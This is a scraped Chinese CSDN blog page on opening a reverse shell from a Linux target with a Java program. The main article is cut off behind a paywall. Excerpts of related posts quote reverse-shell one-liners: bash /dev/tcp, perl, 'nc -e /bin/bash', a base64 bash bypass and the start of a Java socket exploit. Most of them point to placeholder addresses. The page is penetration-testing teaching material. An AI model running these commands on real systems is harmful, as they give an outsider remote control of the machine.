【Linux】利用Java反弹shell

最新推荐文章于 2022-11-14 14:20:16 发布
最新推荐文章于 2022-11-14 14:20:16 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: 笔记 文章标签: linux java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42022374/article/details/111311166
版权
本文详细介绍了如何在Linux环境下利用Java编写反弹shell,攻击机需要开启监听端口,而靶机则需要编辑并编译运行特定的Java程序,确保类名与文件名相同,将攻击机的IP和监听端口填入。执行后,攻击机成功捕获到反弹的shell。
摘要由CSDN通过智能技术生成

攻击机

开启监听端口
在这里插入图片描述

靶机

编辑Test.java
注意事项:类名要和文件名一致。

public class Test {
   
    /**
    * @param args
    * @throws Exception 
    */
public static void main(String[] args) throws Exception {
最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java 反弹连接_渗透-N种反弹shell方法
weixin_30753213的博客
02-27 791
简介reverse shell反弹shell或者说反向shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。通常用于被控端因防火墙受限、权限不足、端口被占用等情形。什么是反弹,为什么要反弹假设我们攻击了一台机器,打开了该机器的一个端...
linux利用java反弹shell_linux反弹shell命令解析
weixin_35662493的博客
02-26 566
今天在看spark stream的sample样例的时候看到linux的万金油命令nc。搜索相关的内容突然发现一个很好玩的用处就是反弹shell.下面我们就来讲讲反弹shell1. 什么是反弹shell简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。2. 反弹shell的用途这个反弹shell大部分用途是用来侵入别人的主机。就是因为感觉很厉害的样子,所以才来研究这家伙3. 反...
java反弹shell
a807719447的专栏
01-26 2021
import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; public class Exploit { public Exploit() throws Exception { String host="xx.xx.xx.xx"; int port=9001; String cmd="/bi.
linux利用java反弹shell_Linux反弹shell方法
weixin_31905417的博客
02-26 158
bash版本:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1注意这个是由解析shell的bash完成,所以某些情况下不支持perl版本:perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connec...
使用java命令执行函数反弹windows-shell
qq_51478862的博客
04-16 3797
前言 偶尔有时命令执行有效负载Runtime.getRuntime().exec()会失败。使用Webshell,反序列化漏洞或其他向量时可能会发生这种情况。 这是因为重定向和管道字符的使用方式在正在启动的进程的上下文中没有意义。 所以不像在命令框中可以直接运行复杂命令 对于Linux靶机可以使用base64编码命令进行绕过。 bash -c {echo,命令进行base64编码}|{base64,-d}|{bash,-i} 而对于windows系统一直没有解决方法。 而这篇文章就是解决该问题的。 因为语雀
Java调用linux shell脚本的方法
09-03
Java编程中,有时我们需要与操作系统进行交互,例如在Linux环境下执行shell脚本来完成特定的任务。本文将详细探讨如何在Java程序中调用Linux shell脚本,并解释相关的关键概念和步骤。 首先,调用shell脚本的基本...
Linux下NC反弹shell命令(推荐)
09-15
本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作,并提供其他编程语言的反弹Shell命令作为参考。 首先,攻击者需要在自己的机器上启动一个监听服务来接收目标机器的连接。这通常通过以下`nc`命令完成: ...
linux shelljava操作实现
07-22
本文将深入探讨如何通过Java代码实现对Linux服务器的远程控制,利用Shell命令进行一系列操作。这一技术对于系统管理员和开发者来说,是提升效率、进行分布式系统管理的重要工具。 首先,Java提供了JSch库,它允许...
linux反弹shell的原理详解
01-08
利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,0>&1 意思是...
java调用shell获取错误信息_记一次突破反弹shell
weixin_39994461的博客
11-20 295
这是酒仙桥六号部队的第 106篇文章。全文共计1809个字,预计阅读时长6分钟。背景某天闲着无聊,小伙伴发来一个某网站,说只能执行命令,不能反弹shell。测试对着目标站点一顿测试。发现确实存在shiro反序列化,并且存在可以利用的gadget。利用发现确实可以执行命令,但是我们执行反弹的时候。反弹不回来,emmm。查看各种系命令以及分析。发现是一个精简的Linux,经常用于doc...
java调用shell(包含有参数的调用)
06-05
java调用shell 包含简单的编写shell文件 调用含有参数的shell文件
linux利用java反弹shell_Java Runtime.exe() 执行命令与反弹shell(上)
weixin_34710938的博客
02-26 563
0x00 前言在自己学习复现 Nexus Repository Manager 3 RCE 漏洞的时候(CVE-2020-10199/10204)由于自己对 Java 的 Runtime.exec() 执行命令以及反弹shell理解的太过于浅薄,使用了以下语句无法反弹shell,踩了很多坑$\\A{''.getClass().forName('java.lang.Runtime').getMeth...
反弹Shell原理与实现
最新发布
m0_62451321的博客
11-14 3193
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
linux利用java反弹shell_Linux重定向及反弹shell详解
weixin_36288711的博客
02-26 190
这里说Linux重定向的原因主要还是为了详细了解一下Linux中的反弹shell目录0x01 文件描述符0x02 重定向0x03 反弹shell0x04 交互重定向0x05 命令变形0x01 文件描述符Linux的文件描述符有以下三种标准输入:0标准输出:1错误输出:2对于文件描述符就先知道这些就可以了,具体的使用会在重定向中来说,重定向就是对文件描述符的操作0x02 重定向重定向主要分为以下两种...
【渗透测试笔记】之【内网渗透——传输层隧道(nc的使用:nc的正反向shell、bash、python、php、java反向shell、内网转发)】
AA8j的博客
10-21 1251
文章目录实验环境1 下载与部署2 使用方法2.1 正向shell2.2 反向shell 实验环境 kali(攻击机,外网地址:192.168.8.48) Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10) CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13) Windows2012(DC,内网地址:10.1.1.2) 1 下载与部署 下载地址:https://github.com/AA8j/SecTools/tre
linux利用java反弹shell_linux反弹shell
weixin_42509888的博客
02-26 409
参考链接http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.htmlhttp://www.waitalone.cn/linux-shell-rebound-under-way.htmlhttp://roo7break.co.uk/?p=215http://pentestmonkey.net/cheat-sheet/shells/re...
linux利用java反弹shell_从一次渗透谈到linux如何反弹shell
weixin_39624980的博客
02-26 570
[前言:在乌云社区看到反弹shell的几种姿势,看过之余自己还收集了一些,动手试了下,仅供参考]0x01 Bashbash -i >& /dev/tcp/10.0.0.1/8080 0>&1这里shell由bash解析,有时候是由sh解析,不一定百发百中***在虚拟机里面试过可行,替换成自己的地址和端口即可******/dev/[tcp|upd]/host/port是L...
log4j反弹shell
qq_33834637的博客
04-25 4456
漏洞描述 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。 本次远程代码执行漏洞正是由于组件存在 Java JNDI 注入漏洞:当程序将用户输入的数据记录到日志时,攻击者通过构造特殊请求,来触发 Apache
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值